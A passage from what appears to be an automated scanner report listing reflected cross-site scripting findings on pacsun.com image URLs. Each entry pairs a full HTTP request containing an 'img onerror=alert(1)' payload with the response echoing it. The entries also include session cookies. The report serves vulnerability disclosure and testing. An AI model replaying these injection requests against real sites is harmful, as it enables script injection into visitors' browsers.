Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8357543_0179f41<img src=a onerror=alert(1)>5ccd163b7c8

3.168. http://images3.pacsun.com/is/image/pacsunproducts/8359663_01_010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8359663_01_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344 was submitted in the REST URL parameter 4. This input was echoed as 755eb<img src=a onerror=alert(1)>47067a17344 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8359663_01_010755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8359663_01_010755eb<img src=a onerror=alert(1)>47067a17344

3.169. http://images3.pacsun.com/is/image/pacsunproducts/8365843_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8365843_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60 was submitted in the REST URL parameter 4. This input was echoed as 1d143<img src=a onerror=alert(1)>936e8defb60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8365843_011d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8365843_011d143<img src=a onerror=alert(1)>936e8defb60

3.170. http://images3.pacsun.com/is/image/pacsunproducts/8379786_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8379786_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f was submitted in the REST URL parameter 4. This input was echoed as 69983<img src=a onerror=alert(1)>f35ffca885f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8379786_0169983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8379786_0169983<img src=a onerror=alert(1)>f35ffca885f

3.171. http://images3.pacsun.com/is/image/pacsunproducts/8387508_01_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_01_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009 was submitted in the REST URL parameter 4. This input was echoed as 83df9<img src=a onerror=alert(1)>d9b39cf6009 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8387508_01_04083df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8387508_01_04083df9<img src=a onerror=alert(1)>d9b39cf6009

3.172. http://images3.pacsun.com/is/image/pacsunproducts/8387508_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5 was submitted in the REST URL parameter 4. This input was echoed as 9d13e<img src=a onerror=alert(1)>698417051a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8387508_sw_0019d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8387508_sw_0019d13e<img src=a onerror=alert(1)>698417051a5

3.173. http://images3.pacsun.com/is/image/pacsunproducts/8387508_sw_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8387508_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776 was submitted in the REST URL parameter 4. This input was echoed as 99b97<img src=a onerror=alert(1)>a15cb515776 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8387508_sw_04099b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8387508_sw_04099b97<img src=a onerror=alert(1)>a15cb515776

3.174. http://images3.pacsun.com/is/image/pacsunproducts/8397788_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8397788_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6863f<img%20src%3da%20onerror%3dalert(1)>762e2322661 was submitted in the REST URL parameter 4. This input was echoed as 6863f<img src=a onerror=alert(1)>762e2322661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8397788_016863f<img%20src%3da%20onerror%3dalert(1)>762e2322661?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8397788_016863f<img src=a onerror=alert(1)>762e2322661

3.175. http://images3.pacsun.com/is/image/pacsunproducts/8407777_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8407777_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e was submitted in the REST URL parameter 4. This input was echoed as eac13<img src=a onerror=alert(1)>9cf9d655a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8407777_01eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:58 GMT
Connection: close

Unable to find /pacsunproducts/8407777_01eac13<img src=a onerror=alert(1)>9cf9d655a9e

3.176. http://images3.pacsun.com/is/image/pacsunproducts/8411902_01_054 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_01_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c was submitted in the REST URL parameter 4. This input was echoed as 7801f<img src=a onerror=alert(1)>61f7452cf3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_01_0547801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_01_0547801f<img src=a onerror=alert(1)>61f7452cf3c

3.177. http://images3.pacsun.com/is/image/pacsunproducts/8411902_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b was submitted in the REST URL parameter 4. This input was echoed as 947c7<img src=a onerror=alert(1)>1af0a08797b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_sw_001947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_sw_001947c7<img src=a onerror=alert(1)>1af0a08797b

3.178. http://images3.pacsun.com/is/image/pacsunproducts/8411902_sw_054 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8411902_sw_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1068d<img%20src%3da%20onerror%3dalert(1)>1d595725188 was submitted in the REST URL parameter 4. This input was echoed as 1068d<img src=a onerror=alert(1)>1d595725188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8411902_sw_0541068d<img%20src%3da%20onerror%3dalert(1)>1d595725188?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:14 GMT
Connection: close

Unable to find /pacsunproducts/8411902_sw_0541068d<img src=a onerror=alert(1)>1d595725188

3.179. http://images3.pacsun.com/is/image/pacsunproducts/8425670_01_041 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8425670_01_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312 was submitted in the REST URL parameter 4. This input was echoed as 5e727<img src=a onerror=alert(1)>7a30eede312 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8425670_01_0415e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
